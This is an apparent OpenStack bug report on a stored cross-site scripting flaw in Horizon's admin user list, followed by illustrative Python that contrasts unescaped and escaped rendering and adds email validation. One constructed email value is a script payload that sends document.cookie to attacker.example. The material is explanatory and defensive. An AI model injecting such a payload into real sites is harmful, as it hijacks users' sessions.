Stored XSS for /admin/users/

Bug #1320233 reported by michael xin
Affects                        Status      Importance  Assigned to  Milestone
OpenStack Dashboard (Horizon)  New         Undecided   Unassigned
OpenStack Security Advisory    Incomplete  Undecided   Unassigned

Bug Description

The /admin/users/ page does not output-encode users' email addresses correctly. Since there is no user input validation for the user's email address during the creation process, it is possible to inject a script tag into the email address. This is a stored cross-site scripting issue.

The issue can be abused to hijack a user's session, implant malware, etc.

For example, attached is a screen capture of Horizon showing users with the stored XSS in action.
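As an added illustration, not code from the Horizon project or from this report, the Python below reproduces the failure the description names: a row renderer that interpolates the email field straight into markup without output encoding, beside one that HTML-escapes every untrusted field, plus a creation-time allow-list check that rejects markup metacharacters in the address. The user records, the function names and the regular expression are constructed for the example; Horizon is a Django application and relies on Django's template autoescaping rather than this hand-rolled escaping.

```python
import html
import re

# Constructed sample data: one ordinary user and one whose email field carries
# an injected script tag, the kind of value the report says was accepted at
# user creation. Not data from the report or from Horizon.
CONSTRUCTED_USERS = [
    {"name": "alice", "email": "alice@example.com"},
    {
        "name": "mallory",
        "email": '"><script>document.location="http://attacker.example/?c="'
                 "+document.cookie</script>@example.com",
    },
]


def render_row_vulnerable(user):
    """Hypothetical renderer that interpolates fields with no output encoding.

    Stands in for a template that emits the field unescaped; it is not
    Horizon's code. Any '<' in the email reaches the browser as markup.
    """
    return "<tr><td>{name}</td><td>{email}</td></tr>".format(**user)


def render_row_safe(user):
    """Same row, with each untrusted field HTML-escaped before interpolation.

    quote=True also encodes the double quote, which matters when a value is
    ever placed inside an attribute rather than between tags.
    """
    return "<tr><td>{}</td><td>{}</td></tr>".format(
        html.escape(user["name"], quote=True),
        html.escape(user["email"], quote=True),
    )


def render_table(users, renderer):
    """Render the user list with the given row renderer."""
    return "<table>" + "".join(renderer(u) for u in users) + "</table>"


# Conservative allow-list for an address accepted at creation time (an
# assumption for this example, not full RFC 5322). The point is that '<', '>'
# and '"' are never part of a valid address, so rejecting them here closes
# the injection path even if a template somewhere forgets to escape.
_EMAIL_RE = re.compile(r"^[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}$")


def is_plausible_email(value):
    """Return True only for addresses built from the allow-listed characters."""
    return bool(_EMAIL_RE.fullmatch(value))


def contains_script_tag(rendered):
    """Check whether rendered HTML still carries a raw <script> tag."""
    return bool(re.search(r"<script\b", rendered, re.IGNORECASE))


if __name__ == "__main__":
    for label, renderer in (("vulnerable", render_row_vulnerable),
                            ("escaped", render_row_safe)):
        out = render_table(CONSTRUCTED_USERS, renderer)
        print(label, "script tag reaches browser:", contains_script_tag(out))
    for u in CONSTRUCTED_USERS:
        print(u["name"], "accepted at creation:", is_plausible_email(u["email"]))
```

The two defences are independent: the escaping fixes the output side that the report identifies on /admin/users/, while the allow-list check blocks the stored value at creation so that every other page that later displays the address is protected as well.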

Changed in ossa: status: New → Incomplete
Jeremy Stanley (fungi): information type: Private Security → Public Security